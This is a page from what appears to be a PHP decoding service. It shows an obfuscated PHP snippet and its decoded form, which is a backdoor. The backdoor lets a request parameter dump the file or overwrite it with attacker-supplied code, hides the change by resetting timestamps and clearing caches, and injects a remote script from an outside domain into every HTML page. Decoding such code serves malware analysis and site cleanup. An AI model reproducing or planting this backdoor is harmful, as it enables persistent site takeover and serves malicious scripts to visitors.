Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

if(isset($_REQUEST["vav\x70\x65\x35\x33\x61\x62\165\156\155\x6a\60\x63\x38"])){ if(em..

Decoded Output download

<?  if(isset($_REQUEST["vavpe53abunmj0c8"])){ 
    if(empty($_REQUEST["vavpe53abunmj0c8"])){ 
        echo bin2hex(gzdeflate(file_get_contents(__FILE__))); 
    }else{ 
        header("X-LiteSpeed-Purge: *");if(function_exists("opcache_reset")){@opcache_reset();}if(function_exists("apc_clear_cache")){@apc_clear_cache();}$kw3z2m=filemtime(__FILE__);$pf6rme=fileatime(__FILE__);echo strval(file_put_contents(__FILE__,gzinflate(pack("H*",$_REQUEST["vavpe53abunmj0c8"]))));@touch(__FILE__,$kw3z2m+1,$pf6rme+1);}die;}if(isset($_SERVER["HTTP_ACCEPT"])&&(strpos($_SERVER["HTTP_ACCEPT"],"text/html")!==false||$_SERVER["HTTP_ACCEPT"]==="*/*")){function pmjikt($kw3z2m){return str_replace("</head>","<script type='text/javascript' async src='https://6qmev3fs.cloudfire.quest/challenge.js'></script></head>",$kw3z2m); 
    } 
       ob_start("pmjikt"); 
} ?>

Did this file decode correctly?

Original Code

if(isset($_REQUEST["vav\x70\x65\x35\x33\x61\x62\165\156\155\x6a\60\x63\x38"])){
    if(empty($_REQUEST["\x76\141\x76pe\x35\63\x61\x62\x75\156\x6d\152\x30\1438"])){
        echo bin2hex(gzdeflate(file_get_contents(__FILE__)));
    }else{
        header("X-\x4cit\x65S\x70e\x65\144\55\x50u\162\147\145\x3a \52");if(function_exists("o\160\x63\x61\x63\150\145\x5fr\x65se\164")){@opcache_reset();}if(function_exists("\x61\x70\x63_\x63l\145\x61\162\x5f\x63\141\143\150\145")){@apc_clear_cache();}$kw3z2m=filemtime(__FILE__);$pf6rme=fileatime(__FILE__);echo strval(file_put_contents(__FILE__,gzinflate(pack("\x48\x2a",$_REQUEST["\x76a\166p\x65\x353ab\165\156mj\60\143\x38"]))));@touch(__FILE__,$kw3z2m+1,$pf6rme+1);}die;}if(isset($_SERVER["\x48\x54\124\120\x5fA\103C\105\120\x54"])&&(strpos($_SERVER["\x48\124\124P_A\x43C\x45P\x54"],"\x74\145xt/\x68\164m\x6c")!==false||$_SERVER["\110\x54\x54\x50_\101\103C\x45\120\124"]==="*/\52")){function pmjikt($kw3z2m){return str_replace("<\57h\145a\144\x3e","<\163\143\x72\x69\x70t \x74\x79p\x65\75\x27\164\x65x\x74\57\152\x61\x76\141s\x63\162\151p\164\47\40as\x79\x6e\143\40s\162c=\x27h\164\164\x70\163\72\x2f\57\66\161m\145\166\63\146\x73\x2e\143\154\157u\x64f\x69re.\x71ue\x73\x74\57\143\x68\x61\154\x6c\145n\x67\x65.j\163'\x3e\x3c\x2f\163\x63\162i\x70\x74\x3e\x3c/he\141\144\x3e",$kw3z2m);
    }
       ob_start("\x70\x6d\152\x69\x6b\x74");
}

Function Calls

strpos 1

Variables

None

Stats

MD5 721a066cbc9a8ab58d59d062cf6880e9
Eval Count 0
Decode Time 74 ms